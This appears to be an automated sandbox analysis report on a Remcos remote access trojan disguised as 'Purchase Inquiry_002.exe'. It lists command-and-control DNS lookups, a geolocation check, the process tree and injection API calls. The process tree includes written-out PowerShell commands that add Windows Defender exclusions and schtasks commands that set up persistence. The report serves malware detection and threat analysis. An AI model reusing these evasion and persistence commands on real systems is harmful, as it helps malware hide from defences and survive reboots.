Nov 21, 2024 12:21:49.197150946 CET | 192.168.2.10 | 1.1.1.1 | 0x6c79 | Standard query (0) | cee.work.gd | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:21:50.197642088 CET | 192.168.2.10 | 1.1.1.1 | 0x6c79 | Standard query (0) | cee.work.gd | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:21:52.236526012 CET | 192.168.2.10 | 1.1.1.1 | 0x6c79 | Standard query (0) | cee.work.gd | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:21:55.390942097 CET | 192.168.2.10 | 1.1.1.1 | 0xf6fa | Standard query (0) | cee.work.gd | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:21:56.390590906 CET | 192.168.2.10 | 1.1.1.1 | 0xf6fa | Standard query (0) | cee.work.gd | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:21:57.406150103 CET | 192.168.2.10 | 1.1.1.1 | 0xf6fa | Standard query (0) | cee.work.gd | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:21:59.406851053 CET | 192.168.2.10 | 1.1.1.1 | 0xf6fa | Standard query (0) | cee.work.gd | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:22:00.594325066 CET | 192.168.2.10 | 1.1.1.1 | 0xc6de | Standard query (0) | cee.work.gd | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:22:01.593626976 CET | 192.168.2.10 | 1.1.1.1 | 0xc6de | Standard query (0) | cee.work.gd | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:22:05.437208891 CET | 192.168.2.10 | 1.1.1.1 | 0xf662 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:22:19.328787088 CET | 192.168.2.10 | 1.1.1.1 | 0x8fd | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 21, 2024 12:21:52.353193998 CET | 1.1.1.1 | 192.168.2.10 | 0x6c79 | Server failure (2) | cee.work.gd | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:21:52.353215933 CET | 1.1.1.1 | 192.168.2.10 | 0x6c79 | Server failure (2) | cee.work.gd | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:21:52.353229046 CET | 1.1.1.1 | 192.168.2.10 | 0x6c79 | Server failure (2) | cee.work.gd | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:21:52.464458942 CET | 1.1.1.1 | 192.168.2.10 | 0x6c79 | Server failure (2) | cee.work.gd | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:21:59.580117941 CET | 1.1.1.1 | 192.168.2.10 | 0xf6fa | Server failure (2) | cee.work.gd | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:21:59.580132961 CET | 1.1.1.1 | 192.168.2.10 | 0xf6fa | Server failure (2) | cee.work.gd | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:21:59.580142975 CET | 1.1.1.1 | 192.168.2.10 | 0xf6fa | Server failure (2) | cee.work.gd | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:21:59.633011103 CET | 1.1.1.1 | 192.168.2.10 | 0xf6fa | Server failure (2) | cee.work.gd | none | none | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:22:02.189199924 CET | 1.1.1.1 | 192.168.2.10 | 0xc6de | No error (0) | cee.work.gd | | 154.216.19.141 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:22:02.189265966 CET | 1.1.1.1 | 192.168.2.10 | 0xc6de | No error (0) | cee.work.gd | | 154.216.19.141 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:22:05.674540043 CET | 1.1.1.1 | 192.168.2.10 | 0xf662 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 12:22:19.555680990 CET | 1.1.1.1 | 192.168.2.10 | 0x8fd | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                              • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49757 | 178.237.33.50 | 80 | 8184 | C:\Users\user\Desktop\Purchase Inquiry_002.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:22:05.799211025 CET | 71 | OUT | GET /json.gp HTTP/1.1
                              Host: geoplugin.net
                              Cache-Control: no-cache
Nov 21, 2024 12:22:07.045173883 CET | 1170 | IN | HTTP/1.1 200 OK
                              date: Thu, 21 Nov 2024 11:22:06 GMT
                              server: Apache
                              content-length: 962
                              content-type: application/json; charset=utf-8
                              cache-control: public, max-age=300
                              access-control-allow-origin: *
                              Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                              Target ID:0
                              Start time:06:21:43
                              Start date:21/11/2024
                              Path:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Purchase Inquiry_002.exe"
                              Imagebase:0x360000
                              File size:914'432 bytes
                              MD5 hash:C016B06A4942455DF9CE8A58B72BCC90
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe"
                              Imagebase:0x6e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff620390000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"
                              Imagebase:0x6e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff620390000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp"
                              Imagebase:0xdf0000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff620390000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Purchase Inquiry_002.exe"
                              Imagebase:0xd70000
                              File size:914'432 bytes
                              MD5 hash:C016B06A4942455DF9CE8A58B72BCC90
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              Target ID:10
                              Start time:06:21:47
                              Start date:21/11/2024
                              Path:C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
                              Imagebase:0x9d0000
                              File size:914'432 bytes
                              MD5 hash:C016B06A4942455DF9CE8A58B72BCC90
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 74%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:11
                              Start time:06:21:49
                              Start date:21/11/2024
                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0x7ff6616b0000
                              File size:496'640 bytes
                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:12
                              Start time:06:21:50
                              Start date:21/11/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"
                              Imagebase:0xdf0000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:13
                              Start time:06:21:50
                              Start date:21/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff620390000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:14
                              Start time:06:21:51
                              Start date:21/11/2024
                              Path:C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"
                              Imagebase:0xcc0000
                              File size:914'432 bytes
                              MD5 hash:C016B06A4942455DF9CE8A58B72BCC90
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1359604043.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:10.9%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:198
                                Total number of Limit Nodes:6

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: :$~
                                • API String ID: 0-2431124681

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: D
                                • API String ID: 0-2746444292
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0281D07E
                                • GetCurrentThread.KERNEL32 ref: 0281D0BB
                                • GetCurrentProcess.KERNEL32 ref: 0281D0F8
                                • GetCurrentThreadId.KERNEL32 ref: 0281D151
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0281D07E
                                • GetCurrentThread.KERNEL32 ref: 0281D0BB
                                • GetCurrentProcess.KERNEL32 ref: 0281D0F8
                                • GetCurrentThreadId.KERNEL32 ref: 0281D151
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0

                                Control-flow Graph

                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D91506
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 985f5ab2721b63e77b164279d5456a71160451289334b106315514fc57658223
                                • Instruction ID: 67e15266b1a1452e2af5100627b4b6e5c57454199f94017f10a8afe88d1e3b2c
                                • Opcode Fuzzy Hash: 985f5ab2721b63e77b164279d5456a71160451289334b106315514fc57658223
                                • Instruction Fuzzy Hash: F0A14971D0061A9FEF60DFA8CC41BEDBBB2BF48314F158569D809A7280DB749985CFA1

                                Control-flow Graph (graph image omitted): basic blocks 6d912d0-6d91615, API call CreateProcessA in block 6d9145f-6d91519
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D91506
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 224530f22cf88f73c2203369280e6bbd908a6b40eacb11437bfebc8e4d7f910f
                                • Instruction ID: 581cba48fb858c641729cf9c519d69f2e096031d6d625cb37e1646b64ed241c5
                                • Opcode Fuzzy Hash: 224530f22cf88f73c2203369280e6bbd908a6b40eacb11437bfebc8e4d7f910f
                                • Instruction Fuzzy Hash: 30914971D0061A9FEF60CFA8CC41BEDBBB2BF48314F158569D809A7280DB749985CFA1

                                Control-flow Graph (graph image omitted): basic blocks 281ad68-281afe8, API call GetModuleHandleW in block 281afa0-281afcb; internal calls to 281a08c, 281a098, 281a0a8, 281a0b8, 281a0c8, 281aff0, 281b000
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0281AFBE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: e68e79b102966ac80291a3bf0de4817ef0186c0614078dabce6e82187d7b4d3f
                                • Instruction ID: c6afec97d5f78084df0b878a5a3b6b8c2cef54ba728cbf0f2b3098a2a81c1c1b
                                • Opcode Fuzzy Hash: e68e79b102966ac80291a3bf0de4817ef0186c0614078dabce6e82187d7b4d3f
                                • Instruction Fuzzy Hash: 2E7116B8A01B058FDB28DF29D05075AB7F6BF88304F10892DD48AD7B90DB75E949CB91

                                Control-flow Graph (graph image omitted): basic blocks 28144b4-2815b14, API call CreateActCtxA in block 28144b4-28159d9
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 028159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b0459eef1d98714b54a47b9d546df1b440cd975e84f4b33f9820b561e4777613
                                • Instruction ID: b52592577fff2d83c115a8b247dc13fd58980522f77552e33af5edf0ed01671a
                                • Opcode Fuzzy Hash: b0459eef1d98714b54a47b9d546df1b440cd975e84f4b33f9820b561e4777613
                                • Instruction Fuzzy Hash: 3841E274C0071DCBEB24DFA9C884B9DBBF5BF88304F60815AD408AB295DBB56949CF90

                                Control-flow Graph (graph image omitted): basic blocks 281590c-2815b14, API call CreateActCtxA in block 281590c-28159d9
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 028159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 0d9e31334e7f3eec97562d4fcc33f34a853e7f8443e14bc730254758c1326098
                                • Instruction ID: 1d103b3f3caf844daece8ae19ae0f19727a9bc7ea48b4322b2c8c117ffccad38
                                • Opcode Fuzzy Hash: 0d9e31334e7f3eec97562d4fcc33f34a853e7f8443e14bc730254758c1326098
                                • Instruction Fuzzy Hash: D841E374C00719CFEB24DFA9C884BCDBBB6BF48304F20815AC418AB291DBB56949CF50

                                Control-flow Graph (graph image omitted): basic blocks 6d91040-6d9111e, API call WriteProcessMemory in block 6d910a9-6d910e5
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D910D8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 6d999f5265b5526fffd2adcc34a5c57b624a04e10b85b2ef6a5e7cbf3cdda5b1
                                • Instruction ID: 72d5de7eadc3e9e1a91c822f71880a22d8d9877f234bb0705bddcda84f80bc2e
                                • Opcode Fuzzy Hash: 6d999f5265b5526fffd2adcc34a5c57b624a04e10b85b2ef6a5e7cbf3cdda5b1
                                • Instruction Fuzzy Hash: 552125759003499FDF10DFAAC885BEEBBF5FF48310F108829E959A7240C7799954CB60

                                Control-flow Graph (graph image omitted): basic blocks 6d91048-6d9111e, API call WriteProcessMemory in block 6d910a6-6d910e5
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D910D8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 970e3568102a7c925a45407c9ac2ab99e413f4744efb732bfa5da960770a8186
                                • Instruction ID: 398b0f83cc513c57cb66f32c07206c44c28ba7a467c5d3fd3f9bae9eff67772d
                                • Opcode Fuzzy Hash: 970e3568102a7c925a45407c9ac2ab99e413f4744efb732bfa5da960770a8186
                                • Instruction Fuzzy Hash: E12102759003499FDB10DFAAC884BEEBBF5FB48310F10842AE919A7250C779A954CBA0

                                Control-flow Graph (graph image omitted): basic blocks 6d90ea8-6d90f74, API call Wow64SetThreadContext in block 6d90f0b-6d90f3b
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D90F2E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 970dfd6817fc552eeb0010be4de6d3d2096dacc41a39269e00b72952ab43af5b
                                • Instruction ID: c3a2c22a24e193bcb6c917eff08006d383fbae47470ce791472ea292963ec313
                                • Opcode Fuzzy Hash: 970dfd6817fc552eeb0010be4de6d3d2096dacc41a39269e00b72952ab43af5b
                                • Instruction Fuzzy Hash: D8218C71D043099FDB10CFAAC4857EEBBF5EF48214F14842DD459A7240C7789A85CFA4

                                Control-flow Graph (graph image omitted): basic blocks 6d91131-6d911fe, API call ReadProcessMemory in block 6d91131-6d911c5
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D911B8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 8a77d1638b3fbf87c37a4fb1760675248e28ec9b4af58089480a175c9a1dbf75
                                • Instruction ID: 4518bb1398be12c19657d5f4e52ae78cef9c1ddb2d96d8e1d8b86346fb85c812
                                • Opcode Fuzzy Hash: 8a77d1638b3fbf87c37a4fb1760675248e28ec9b4af58089480a175c9a1dbf75
                                • Instruction Fuzzy Hash: EB2134B1D003499FDB10DFAAC880BEEBBF5FF48310F10842AE958A7250C7789940CBA1

                                Control-flow Graph (graph image omitted): basic blocks 6d90eb0-6d90f74, API call Wow64SetThreadContext in block 6d90f0b-6d90f3b
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D90F2E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: f4a47fb226c128d7b762bca9f73a61091843f56af9a31a4c26789cb2f6102052
                                • Instruction ID: 516310a1f2a8d9e81c02d62d59fff28348643dc3b37546c1855cef8d496f4a85
                                • Opcode Fuzzy Hash: f4a47fb226c128d7b762bca9f73a61091843f56af9a31a4c26789cb2f6102052
                                • Instruction Fuzzy Hash: 1F211871D003098FDB14DFAAC4857EEBBF5EF48224F14842AD459A7241C778AA45CFA4

                                Control-flow Graph (graph image omitted): basic blocks 6d91138-6d911fe, API call ReadProcessMemory in block 6d91138-6d911c5
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D911B8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: d67e21911c0b4bd39960cd300c21d0e070d58c3062d60530eea8f10ab81ce8fd
                                • Instruction ID: cb2ca4966a9cda58fbbaf5738386b1641bb7cb19b334f698802798458cf22be6
                                • Opcode Fuzzy Hash: d67e21911c0b4bd39960cd300c21d0e070d58c3062d60530eea8f10ab81ce8fd
                                • Instruction Fuzzy Hash: A12114B1D003499FDB10DFAAC880BEEBBF5FF48310F10842AE919A7250C7799941CBA0
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0281D6D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 5f0fdf5daeb3202f260e56aee3a82bf58bdace47f6fcb95c62a2a3a329c0c58b
                                • Instruction ID: 82db13acbfc31767844ee0b83067d8332efc2986795745f32d17b9c5f3a3ef38
                                • Opcode Fuzzy Hash: 5f0fdf5daeb3202f260e56aee3a82bf58bdace47f6fcb95c62a2a3a329c0c58b
                                • Instruction Fuzzy Hash: ED21E2B5900308AFDB10CFAAD984BDEBBF9EB48310F14801AE918A7350C374A944CFA4
